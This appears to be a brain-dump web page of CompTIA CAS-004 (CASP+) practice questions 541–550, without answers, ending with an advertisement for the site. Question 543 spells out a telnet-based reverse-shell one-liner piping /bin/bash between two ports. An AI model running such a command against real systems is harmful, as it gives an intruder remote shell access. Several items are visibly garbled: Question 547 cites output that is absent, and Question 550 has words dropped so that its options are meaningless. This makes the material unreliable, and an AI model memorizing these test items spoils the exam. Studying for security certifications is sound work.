CAS-004 Exam Details

  • Exam Code
    :CAS-004
  • Exam Name
    :CompTIA Advanced Security Practitioner (CASP+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :792 Q&As
  • Last Updated
    :May 28, 2026

CompTIA CAS-004 Online Questions & Answers

  • Question 541:

    Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts most of the responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement?

    A. IaaS
    B. SaaS
    C. FaaS
    D. PaaS

  • Question 542:

    city government's IT director was notified by the City council that the following cybersecurity requirements must be met to be awarded a large federal grant:

    Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting. All privileged user access must be tightly controlled and tracked to mitigate compromised accounts. Ransomware threats and zero-day vulnerabilities must be quickly identified. Which of the following technologies would BEST satisfy these requirements? (Select THREE).

    A. Endpoint protection
    B. Log aggregator
    C. Zero trust network access
    D. PAM
    E. Cloud sandbox
    F. SIEM
    G. NGFW

  • Question 543:

    A penetration tester inputs the following command: telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344 This command will allow the penetration tester to establish a:

    A. port mirror.
    B. network pivot.
    C. reverse shell.
    D. proxy chain.

  • Question 544:

    An IoT device implements an encryption module built within its SoC, where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware. Which of the following should the IoT manufacture do if the private key is compromised?

    A. Use over-the-air updates to replace the private key.
    B. Manufacture a new IoT device with a redesigned SoC.
    C. Replace the public portion of the IoT key on its servers.
    D. Release a patch for the SoC software.

  • Question 545:

    A software development company needs to mitigate third-party risks to its software supply chain. Which of the following techniques should the company use in the development environment to best meet this objective?

    A. Performing software composition analysis
    B. Requiring multifactor authentication
    C. Establishing coding standards and monitoring for compliance
    D. Implementing a robust unit and regression-testing scheme

  • Question 546:

    An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication?

    A. Perfect forward secrecy on both endpoints
    B. Shared secret for both endpoints
    C. Public keys on both endpoints
    D. A common public key on each endpoint
    E. A common private key on each endpoint

  • Question 547:

    A security analyst is reading the results of a successful exploit that was recently conducted by third-party penetration testers. The testers reverse engineered a privileged executable. In the report, the planning and execution of the exploit is detailed using logs and outputs from the test However, the attack vector of the exploit is missing, making it harder to recommend remediation's. Given the following output:

    The penetration testers MOST likely took advantage of:

    A. A TOC/TOU vulnerability
    B. A plain-text password disclosure
    C. An integer overflow vulnerability
    D. A buffer overflow vulnerability

  • Question 548:

    The Chief Security Officer (CSO) requested the security team implement technical controls that meet the following requirements:

    1.Monitors traffic to and from both local NAS and cloud-based file repositories

    2.Prevents on-site staff who are accessing sensitive customer PII documents on file repositories from accidentally or deliberately sharing sensitive documents on personal SaaS solutions

    3.Uses document attributes to reduce false positives

    4.Is agentless and not installed on staff desktops or laptops

    Which of the following when installed and configured would BEST meet the CSO's requirements? (Choose two.)

    A. DLP
    B. NGFW
    C. UTM
    D. UEBA
    E. CASB
    F. HIPS

  • Question 549:

    Which of the following is required for an organization to meet the ISO 27018 standard?

    A. All Pll must be encrypted.
    B. All network traffic must be inspected.
    C. GDPR equivalent standards must be met
    D. COBIT equivalent standards must be met

  • Question 550:

    An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports.

    Which of the following historian server locations will allow the business to get the required reports in an and IT environment?

    A. In the environment, use a VPN from the IT environment into the environment.
    B. In the environment, allow IT traffic into the environment.
    C. In the IT environment, allow PLCs to send data from the environment to the IT environment.
    D. Use a screened subnet between the and IT environments.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-004 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.